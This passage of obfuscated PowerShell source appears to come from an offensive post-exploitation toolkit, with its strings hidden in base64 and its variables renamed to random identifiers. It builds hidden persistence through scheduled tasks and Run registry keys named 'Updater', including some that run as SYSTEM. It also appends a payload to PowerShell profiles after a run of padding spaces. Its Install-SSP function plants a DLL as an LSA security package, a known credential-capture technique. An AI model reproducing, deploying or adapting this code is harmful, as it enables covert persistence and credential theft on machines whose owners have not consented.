$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YAAiACQAKAAkAEUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAApAFwAUwB5AHMAdABlAG0AMwAyAFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAgAC0ATgBvAG4ASQBuAHQAZQByAGEAYwB0AGkAdgBlAGAAIgA='))) 338 | ${f17dc4af4f9142bfa43c36189ff132e3} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwBjAGgAdABhAHMAawBzACAALwBEAGUAbABlAHQAZQAgAC8AVABOACAAVQBwAGQAYQB0AGUAcgA='))) 339 | switch (${cc4057f43ec0452aa83a64356d7ea926}.Trigger) 340 | { 341 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB0AEwAbwBnAG8AbgA='))) 342 | { 343 | ${d8effee50a3b401592d3653210566b62} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwBjAGgAdABhAHMAawBzACAALwBDAHIAZQBhAHQAZQAgAC8AUgBVACAAcwB5AHMAdABlAG0AIAAvAFMAQwAgAE8ATgBMAE8ARwBPAE4AIAAvAFQATgAgAFUAcABkAGEAdABlAHIAIAAvAFQAUgAgAA=='))) 344 | } 345 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABhAGkAbAB5AA=='))) 346 | { 347 | ${d8effee50a3b401592d3653210566b62} = "schtasks /Create /RU system /SC DAILY /ST $(${cc4057f43ec0452aa83a64356d7ea926}.Time.ToString($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABIADoAbQBtADoAcwBzAA=='))))) /TN Updater /TR " 348 | } 349 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TwBuAEkAZABsAGUA'))) 350 | { 351 | ${d8effee50a3b401592d3653210566b62} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwBjAGgAdABhAHMAawBzACAALwBDAHIAZQBhAHQAZQAgAC8AUgBVACAAcwB5AHMAdABlAG0AIAAvAFMAQwAgAE8ATgBJAEQATABFACAALwBJACAAMQAgAC8AVABOACAAVQBwAGQAYQB0AGUAcgAgAC8AVABSACAA'))) 352 | } 353 | default 354 | { 355 | throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAHYAYQBsAGkAZAAgAGUAbABlAHYAYQB0AGUAZAAgAHAAZQByAHMAaQBzAHQAZQBuAGMAZQAgAG8AcAB0AGkAbwBuAHMAIABwAHIAbwB2AGkAZABlAGQAIQA='))) 356 | } 357 | } 358 | ${d8effee50a3b401592d3653210566b62} = '"' + ${d8effee50a3b401592d3653210566b62} + ${516bba0d0e5b4ca4ab825c6a9c4ef241} + '"' 359 | } 360 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBlAGcAaQBzAHQAcgB5AA=='))) 361 | { 362 | ${d8effee50a3b401592d3653210566b62} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgAEgASwBMAE0AOgBTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgBcACAALQBOAGEAbQBlACAAVQBwAGQAYQB0AGUAcgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0AVgBhAGwAdQBlACAA'))) 363 | ${f17dc4af4f9142bfa43c36189ff132e3} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBlAG0AbwB2AGUALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgAEgASwBMAE0AOgBTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgBcACAALQBOAGEAbQBlACAAVQBwAGQAYQB0AGUAcgA='))) 364 | ${516bba0d0e5b4ca4ab825c6a9c4ef241} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('IgBgACIAJAAoACQARQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACkAXABTAHkAcwB0AGUAbQAzADIAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlAGAAIgAgAC0ATgBvAG4ASQBuAHQAZQByAGEAYwB0AGkAdgBlACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiAA=='))) 365 | ${d8effee50a3b401592d3653210566b62} = "'" + ${d8effee50a3b401592d3653210566b62} + ${516bba0d0e5b4ca4ab825c6a9c4ef241} + "'" 366 | } 367 | default 368 | { 369 | throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAHYAYQBsAGkAZAAgAGUAbABlAHYAYQB0AGUAZAAgAHAAZQByAHMAaQBzAHQAZQBuAGMAZQAgAG8AcAB0AGkAbwBuAHMAIABwAHIAbwB2AGkAZABlAGQAIQA='))) 370 | } 371 | } 372 | switch (${df8063b79a7a452ca1a2f7709c4fa2c5}.Method) 373 | { 374 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawA='))) 375 | { 376 | ${516bba0d0e5b4ca4ab825c6a9c4ef241} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YAAiACQAKAAkAEUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAApAFwAUwB5AHMAdABlAG0AMwAyAFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAgAC0ATgBvAG4ASQBuAHQAZQByAGEAYwB0AGkAdgBlAGAAIgA='))) 377 | ${50dd3889beaf444088a6e13beb8c3d8e} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwBjAGgAdABhAHMAawBzACAALwBEAGUAbABlAHQAZQAgAC8AVABOACAAVQBwAGQAYQB0AGUAcgA='))) 378 | switch (${df8063b79a7a452ca1a2f7709c4fa2c5}.Trigger) 379 | { 380 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABhAGkAbAB5AA=='))) 381 | { 382 | ${5551831a2227477db4a61598ddf7fbc8} = "schtasks /Create /SC DAILY /ST $(${df8063b79a7a452ca1a2f7709c4fa2c5}.Time.ToString($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABIADoAbQBtADoAcwBzAA=='))))) /TN Updater /TR " 383 | } 384 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TwBuAEkAZABsAGUA'))) 385 | { 386 | ${5551831a2227477db4a61598ddf7fbc8} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwBjAGgAdABhAHMAawBzACAALwBDAHIAZQBhAHQAZQAgAC8AUwBDACAATwBOAEkARABMAEUAIAAvAEkAIAAxACAALwBUAE4AIABVAHAAZABhAHQAZQByACAALwBUAFIAIAA='))) 387 | } 388 | default 389 | { 390 | throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAHYAYQBsAGkAZAAgAHUAcwBlAHIALQBsAGUAdgBlAGwAIABwAGUAcgBzAGkAcwB0AGUAbgBjAGUAIABvAHAAdABpAG8AbgBzACAAcAByAG8AdgBpAGQAZQBkACEA'))) 391 | } 392 | } 393 | ${5551831a2227477db4a61598ddf7fbc8} = '"' + ${5551831a2227477db4a61598ddf7fbc8} + ${516bba0d0e5b4ca4ab825c6a9c4ef241} + '"' 394 | } 395 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBlAGcAaQBzAHQAcgB5AA=='))) 396 | { 397 | ${5551831a2227477db4a61598ddf7fbc8} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgAEgASwBDAFUAOgBTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgBcACAALQBOAGEAbQBlACAAVQBwAGQAYQB0AGUAcgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0AVgBhAGwAdQBlACAA'))) 398 | ${50dd3889beaf444088a6e13beb8c3d8e} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBlAG0AbwB2AGUALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgAEgASwBDAFUAOgBTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgBcACAALQBOAGEAbQBlACAAVQBwAGQAYQB0AGUAcgA='))) 399 | ${516bba0d0e5b4ca4ab825c6a9c4ef241} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('IgBgACIAJAAoACQARQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACkAXABTAHkAcwB0AGUAbQAzADIAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlAGAAIgAgAC0ATgBvAG4ASQBuAHQAZQByAGEAYwB0AGkAdgBlACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiAA=='))) 400 | ${5551831a2227477db4a61598ddf7fbc8} = "'" + ${5551831a2227477db4a61598ddf7fbc8} + ${516bba0d0e5b4ca4ab825c6a9c4ef241} + "'" 401 | } 402 | default 403 | { 404 | throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAHYAYQBsAGkAZAAgAHUAcwBlAHIALQBsAGUAdgBlAGwAIABwAGUAcgBzAGkAcwB0AGUAbgBjAGUAIABvAHAAdABpAG8AbgBzACAAcAByAG8AdgBpAGQAZQBkACEA'))) 405 | } 406 | } 407 | ${b659b2714f7e4472b30891ae30f5e1b4} = { 408 | function FUNCTIONNAME{ 409 | Param([Switch]${ac6e7283283e453eaedd99a83d16eb5a}) 410 | $ErrorActionPreference=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQA='))) 411 | ${675e1081ca814260a8f2a0866f0d3c90}={ORIGINALSCRIPT} 412 | if(${ac6e7283283e453eaedd99a83d16eb5a}){ 413 | if(([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgA='))))) 414 | {${81bbd3a50f4d4a3abee6f69f71babbf9}=$PROFILE.AllUsersAllHosts;${2eaa38342e0e4b648d2675d6dba3a304}=ELEVATEDTRIGGER} 415 | else 416 | {${81bbd3a50f4d4a3abee6f69f71babbf9}=$PROFILE.CurrentUserAllHosts;${2eaa38342e0e4b648d2675d6dba3a304}=USERTRIGGER} 417 | md (Split-Path -Parent ${81bbd3a50f4d4a3abee6f69f71babbf9}) 418 | (gc ${81bbd3a50f4d4a3abee6f69f71babbf9}) + (' ' * 600 + ${675e1081ca814260a8f2a0866f0d3c90})|Out-File ${81bbd3a50f4d4a3abee6f69f71babbf9} -Fo 419 | iex ${2eaa38342e0e4b648d2675d6dba3a304}|Out-Null 420 | echo ${2eaa38342e0e4b648d2675d6dba3a304}} 421 | else 422 | {${675e1081ca814260a8f2a0866f0d3c90}.Invoke()} 423 | } EXECUTEFUNCTION 424 | } 425 | ${b659b2714f7e4472b30891ae30f5e1b4} = ${b659b2714f7e4472b30891ae30f5e1b4}.ToString().Replace($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RgBVAE4AQwBUAEkATwBOAE4AQQBNAEUA'))), ${e1647abadf884b208ff363b3ef33e4b0}) 426 | ${b659b2714f7e4472b30891ae30f5e1b4} = ${b659b2714f7e4472b30891ae30f5e1b4}.ToString().Replace($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TwBSAEkARwBJAE4AQQBMAFMAQwBSAEkAUABUAA=='))), ${bdde8df95b13416abc69e7f89b90b98e}) 427 | ${b659b2714f7e4472b30891ae30f5e1b4} = ${b659b2714f7e4472b30891ae30f5e1b4}.ToString().Replace($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQBMAEUAVgBBAFQARQBEAFQAUgBJAEcARwBFAFIA'))), ${d8effee50a3b401592d3653210566b62}) 428 | ${b659b2714f7e4472b30891ae30f5e1b4} = ${b659b2714f7e4472b30891ae30f5e1b4}.ToString().Replace($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBTAEUAUgBUAFIASQBHAEcARQBSAA=='))), ${5551831a2227477db4a61598ddf7fbc8}) 429 | if (${cf9bd0c2aaee4219940dc2dd6ab44219}) 430 | { 431 | ${b659b2714f7e4472b30891ae30f5e1b4} = ${b659b2714f7e4472b30891ae30f5e1b4}.ToString().Replace($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQBYAEUAQwBVAFQARQBGAFUATgBDAFQASQBPAE4A'))), '') 432 | } 433 | else 434 | { 435 | ${b659b2714f7e4472b30891ae30f5e1b4} = ${b659b2714f7e4472b30891ae30f5e1b4}.ToString().Replace($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQBYAEUAQwBVAFQARQBGAFUATgBDAFQASQBPAE4A'))), "${e1647abadf884b208ff363b3ef33e4b0} -Persist") 436 | } 437 | ${95f2db71f337426492d85e9665344ad3} = @" 438 | # Execute the following to remove the elevated persistent payload 439 | ${f17dc4af4f9142bfa43c36189ff132e3} 440 | # Execute the following to remove the user-level persistent payload 441 | ${50dd3889beaf444088a6e13beb8c3d8e} 442 | "@ 443 | ${b659b2714f7e4472b30891ae30f5e1b4} | Out-File ${966f141aaef74dcaab3ffcd81c15f7b8} 444 | Write-Verbose "Persistence script written to ${966f141aaef74dcaab3ffcd81c15f7b8}" 445 | ${95f2db71f337426492d85e9665344ad3} | Out-File ${188aaa68b84a471c8bc115bfaea60abf} 446 | Write-Verbose "Persistence removal script written to ${188aaa68b84a471c8bc115bfaea60abf}" 447 | if (${a9f05a6260d64d84befdddce7da6437b}) 448 | { 449 | echo ([ScriptBlock]::Create(${b659b2714f7e4472b30891ae30f5e1b4})) 450 | } 451 | } 452 | function Install-SSP 453 | { 454 | [CmdletBinding()] Param ( 455 | [ValidateScript({Test-Path (rvpa $_)})] 456 | [String] 457 | ${c64edf13e2624028966218a15073390b} 458 | ) 459 | ${fd8b9b45f19c4400a8fb9de41f05526c} = [Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent() 460 | if(-not ${fd8b9b45f19c4400a8fb9de41f05526c}.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) 461 | { 462 | throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAHMAdABhAGwAbABpAG4AZwAgAGEAbgAgAFMAUwBQACAAZABsAGwAIAByAGUAcQB1AGkAcgBlAHMAIABhAGQAbQBpAG4AaQBzAHQAcgBhAHQAaQB2AGUAIAByAGkAZwBoAHQAcwAuACAARQB4AGUAYwB1AHQAZQAgAHQAaABpAHMAIABzAGMAcgBpAHAAdAAgAGYAcgBvAG0AIABhAG4AIABlAGwAZQB2AGEAdABlAGQAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAcAByAG8AbQBwAHQALgA='))) 463 | } 464 | ${c8a8ed288c9549119b34c598f0cedab7} = rvpa ${c64edf13e2624028966218a15073390b} 465 | function local:Get-PEArchitecture 466 | { 467 | Param 468 | ( 469 | [Parameter( Position = 0, 470 | Mandatory = $True )] 471 | [String] 472 | ${c64edf13e2624028966218a15073390b} 473 | ) 474 | ${e031c7ef3ee1487c89e804262dd8bb1c} = New-Object System.IO.FileStream(${c64edf13e2624028966218a15073390b}, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read) 475 | [Byte[]] $MZHeader = New-Object Byte[](2) 476 | ${e031c7ef3ee1487c89e804262dd8bb1c}.Read($MZHeader,0,2) | Out-Null 477 | ${9a1deaf82de949cb85c843016bdc8031} = [System.Text.AsciiEncoding]::ASCII.GetString($MZHeader) 478 | if (${9a1deaf82de949cb85c843016bdc8031} -ne 'MZ') 479 | { 480 | ${e031c7ef3ee1487c89e804262dd8bb1c}.Close() 481 | Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAHYAYQBsAGkAZAAgAFAARQAgAGgAZQBhAGQAZQByAC4A'))) 482 | } 483 | ${e031c7ef3ee1487c89e804262dd8bb1c}.Seek(0x3c, [System.IO.SeekOrigin]::Begin) | Out-Null 484 | [Byte[]] $lfanew = New-Object Byte[](4) 485 | ${e031c7ef3ee1487c89e804262dd8bb1c}.Read($lfanew,0,4) | Out-Null 486 | ${fe0f917046bf4d9d8a06ef630810cce7} = [Int] ($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MAB4AHsAMAB9AA=='))) -f (( $lfanew[-1..-4] | % { $_.ToString('X2') } ) -join '')) 487 | ${e031c7ef3ee1487c89e804262dd8bb1c}.Seek(${fe0f917046bf4d9d8a06ef630810cce7} + 4, [System.IO.SeekOrigin]::Begin) | Out-Null 488 | [Byte[]] $IMAGE_FILE_MACHINE = New-Object Byte[](2) 489 | ${e031c7ef3ee1487c89e804262dd8bb1c}.Read($IMAGE_FILE_MACHINE,0,2) | Out-Null 490 | ${d3ada9716a024ec4bbd18db5b49df90b} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ewAwAH0A'))) -f (( $IMAGE_FILE_MACHINE[-1..-2] | % { $_.ToString('X2') } ) -join '') 491 | ${e031c7ef3ee1487c89e804262dd8bb1c}.Close() 492 | if ((${d3ada9716a024ec4bbd18db5b49df90b} -ne $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MAAxADQAQwA=')))) -and (${d3ada9716a024ec4bbd18db5b49df90b} -ne $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('OAA2ADYANAA='))))) 493 | { 494 | Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAHYAYQBsAGkAZAAgAFAARQAgAGgAZQBhAGQAZQByACAAbwByACAAdQBuAHMAdQBwAHAAbwByAHQAZQBkACAAYQByAGMAaABpAHQAZQBjAHQAdQByAGUALgA='))) 495 | } 496 | if (${d3ada9716a024ec4bbd18db5b49df90b} -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MAAxADQAQwA=')))) 497 | { 498 | echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MwAyAC0AYgBpAHQA'))) 499 | } 500 | elseif (${d3ada9716a024ec4bbd18db5b49df90b} -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('OAA2ADYANAA=')))) 501 | { 502 | echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('NgA0AC0AYgBpAHQA'))) 503 | } 504 | else 505 | { 506 | echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TwB0AGgAZQByAA=='))) 507 | } 508 | } 509 | ${5fd231bc1f04486897e6d6d3dac6a263} = Get-PEArchitecture ${c8a8ed288c9549119b34c598f0cedab7} 510 | ${7b947702b5f14f0795519fe23e777f55} = gwmi Win32_OperatingSystem | select -ExpandProperty OSArchitecture 511 | if (${5fd231bc1f04486897e6d6d3dac6a263} -ne ${7b947702b5f14f0795519fe23e777f55}) 512 | { 513 | throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VABoAGUAIABvAHAAZQByAGEAdABpAG4AZwAgAHMAeQBzAHQAZQBtACAAYQByAGMAaABpAHQAZQBjAHQAdQByAGUAIABtAHUAcwB0ACAAbQBhAHQAYwBoACAAdABoAGUAIABhAHIAYwBoAGkAdABlAGMAdAB1AHIAZQAgAG8AZgAgAHQAaABlACAAUwBTAFAAIABkAGwAbAAuAA=='))) 514 | } 515 | ${7224f83d7191419f8213c7d4de3ebbf9} = gi ${c8a8ed288c9549119b34c598f0cedab7} | select -ExpandProperty Name 516 | ${068421be1fce4376800328fbc5a28b89} = ${7224f83d7191419f8213c7d4de3ebbf9} | % { % {($_ -split '\.')[0]} } 517 | ${607878ccac164886b2b4e23fcca9041a} = gp HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBlAGMAdQByAGkAdAB5ACAAUABhAGMAawBhAGcAZQBzAA=='))) | 518 | select -ExpandProperty $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBlAGMAdQByAGkAdAB5ACAAUABhAGMAawBhAGcAZQBzAA=='))) 519 | if (${607878ccac164886b2b4e23fcca9041a} -contains ${068421be1fce4376800328fbc5a28b89}) 520 | { 521 | throw "'${068421be1fce4376800328fbc5a28b89}' is already present in HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages." 522 | } 523 | ${106879f3248c4eba9f57aa44fbcd5ccc} = "$($Env:windir)\Sysnative" 524 | if (Test-Path ${106879f3248c4eba9f57aa44fbcd5ccc}) 525 | { 526 | ${0449ce4ae41c4c05b87128b87d60478f} = ${106879f3248c4eba9f57aa44fbcd5ccc} 527 | } 528 | else 529 | { 530 | ${0449ce4ae41c4c05b87128b87d60478f} = "$($Env:windir)\System32" 531 | } 532 | if (Test-Path (Join-Path ${0449ce4ae41c4c05b87128b87d60478f} ${7224f83d7191419f8213c7d4de3ebbf9})) 533 | { 534 | throw "${7224f83d7191419f8213c7d4de3ebbf9} is already installed in ${0449ce4ae41c4c05b87128b87d60478f}." 535 | } 536 | cp ${c8a8ed288c9549119b34c598f0cedab7} ${0449ce4ae41c4c05b87128b87d60478f} 537 | ${607878ccac164886b2b4e23fcca9041a} += ${068421be1fce4376800328fbc5a28b89} 538 | sp HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBlAGMAdQByAGkAdAB5ACAAUABhAGMAawBhAGcAZQBzAA=='))) -Value ${607878ccac164886b2b4e23fcca9041a} 539 | ${1f8ecc981fbb4e47ba061a53044a707d} = New-Object System.Reflection.AssemblyName($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBTAFAASQAyAA==')))) 540 | ${fe4d7ca4026e47f3b620ed1e74c0e37a} = [AppDomain]::CurrentDomain.DefineDynamicAssembly(${1f8ecc981fbb4e47ba061a53044a707d}, [Reflection.Emit.AssemblyBuilderAccess]::Run) 541 | ${ac678682e4f149bfafb1b16e8d88c398} = ${fe4d7ca4026e47f3b620ed1e74c0e37a}.DefineDynamicModule($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBTAFAASQAyAA=='))), $False) 542 | ${45b97198ae354124831731ef24c92007} = ${ac678682e4f149bfafb1b16e8d88c398}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBTAFAASQAyAC4AUwBlAGMAdQByADMAMgA='))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMALAAgAEMAbABhAHMAcwA=')))) 543 | ${3a0d90aa783842659ba2918c88428ef3} = ${45b97198ae354124831731ef24c92007}.DefinePInvokeMethod($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBkAGQAUwBlAGMAdQByAGkAdAB5AFAAYQBjAGsAYQBnAGUA'))), 544 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwBlAGMAdQByADMAMgAuAGQAbABsAA=='))), 545 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMALAAgAFMAdABhAHQAaQBjAA=='))), 546 | [Reflection.CallingConventions]::Standard, 547 | [Int32], 548 | [Type[]] @([String], [IntPtr]), 549 | [Runtime.InteropServices.CallingConvention]::Winapi, 550 | [Runtime.InteropServices.CharSet]::Auto) 551 | ${036a3cc75ce04b6e8c8f0f3f43bb1521} = ${45b97198ae354124831731ef24c92007}.CreateType() 552 | if ([IntPtr]::Size -eq 4) { 553 | ${1c87c8c7352b45ff98e9ead84daaa574} = 20 554 | } else { 555 | ${1c87c8c7352b45ff98e9ead84daaa574} = 24 556 | } 557 | ${8e8f00cc1f994a95a799c9c24396a2e4} = [Runtime.InteropServices.Marshal]::AllocHGlobal(${1c87c8c7352b45ff98e9ead84daaa574}) 558 | [Runtime.InteropServices.Marshal]::WriteInt32(${8e8f00cc1f994a95a799c9c24396a2e4}, ${1c87c8c7352b45ff98e9ead84daaa574}) 559 | ${fc9779339f7f411196a703cc7b137b81} = $True 560 | try { 561 | ${8d8d49797b5b494095bad3098d94ec73} = ${036a3cc75ce04b6e8c8f0f3f43bb1521}::AddSecurityPackage(${068421be1fce4376800328fbc5a28b89}, ${8e8f00cc1f994a95a799c9c24396a2e4}) 562 | } catch { 563 | ${4e989fb8ffc14376960d82cc58c5fd3b} = $Error[0].Exception.InnerException.HResult 564 | Write-Warning "Runtime loading of the SSP failed. (0x$(${4e989fb8ffc14376960d82cc58c5fd3b}.ToString('X8')))" 565 | Write-Warning "Reason: $(([ComponentModel.Win32Exception] ${4e989fb8ffc14376960d82cc58c5fd3b}).Message)" 566 | ${fc9779339f7f411196a703cc7b137b81} = $False 567 | } 568 | if (${fc9779339f7f411196a703cc7b137b81}) { 569 | Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAHMAdABhAGwAbABhAHQAaQBvAG4AIABhAG4AZAAgAGwAbwBhAGQAaQBuAGcAIABjAG8AbQBwAGwAZQB0AGUAIQA='))) 570 | } else { 571 | Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAHMAdABhAGwAbABhAHQAaQBvAG4AIABjAG8AbQBwAGwAZQB0AGUAIQAgAFIAZQBiAG8AbwB0ACAAZgBvAHIAIABjAGgAYQBuAGcAZQBzACAAdABvACAAdABhAGsAZQAgAGUAZgBmAGUAYwB0AC4A'))) 572 | } 573 | } 574 | function Get-SecurityPackages 575 | { 576 | [CmdletBinding()] Param() 577 | ${1f8ecc981fbb4e47ba061a53044a707d} = New-Object System.Reflection.AssemblyName($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBTAFAASQA=')))) 578 | ${fe4d7ca4026e47f3b620ed1e74c0e37a} = [AppDomain]::CurrentDomain.DefineDynamicAssembly(${1f8ecc981fbb4e47ba061a53044a707d}, [Reflection.Emit.AssemblyBuilderAccess]::Run) 579 | ${ac678682e4f149bfafb1b16e8d88c398} = ${fe4d7ca4026e47f3b620ed1e74c0e37a}.DefineDynamicModule($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBTAFAASQA='))), $False) 580 | ${1897ccfb3dd24fdda7662936eb2b8060} = [FlagsAttribute].GetConstructor(@()) 581 | ${dae4b3ac19a04fdbad9eed698a036e31} = New-Object Reflection.Emit.CustomAttributeBuilder(${1897ccfb3dd24fdda7662936eb2b8060}, @()) 582 | ${2a6b61d5404b4a36899cdae620046f62} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAbwBMAGEAeQBvAHUAdAAsACAAQQBuAHMAaQBDAGwAYQBzAHMALAAgAEMAbABhAHMAcwAsACAAUAB1AGIAbABpAGMALAAgAFMAZQBxAHUAZQBuAHQAaQBhAGwATABhAHkAbwB1AHQALAAgAFMAZQBhAGwAZQBkACwAIABCAGUAZgBvAHIAZQBGAGkAZQBsAGQASQBuAGkAdAA='))) 583 | ${d09bb55ff972413ead29f35f8a7f48b0} = ${ac678682e4f149bfafb1b16e8d88c398}.DefineEnum($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBTAFAASQAuAFMARQBDAFAASwBHAF8ARgBMAEEARwA='))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))), [Int32]) 584 | ${d09bb55ff972413ead29f35f8a7f48b0}.SetCustomAttribute(${dae4b3ac19a04fdbad9eed698a036e31}) 585 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBOAFQARQBHAFIASQBUAFkA'))), 1) 586 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABSAEkAVgBBAEMAWQA='))), 2) 587 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VABPAEsARQBOAF8ATwBOAEwAWQA='))), 4) 588 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABBAFQAQQBHAFIAQQBNAA=='))), 8) 589 | $null = 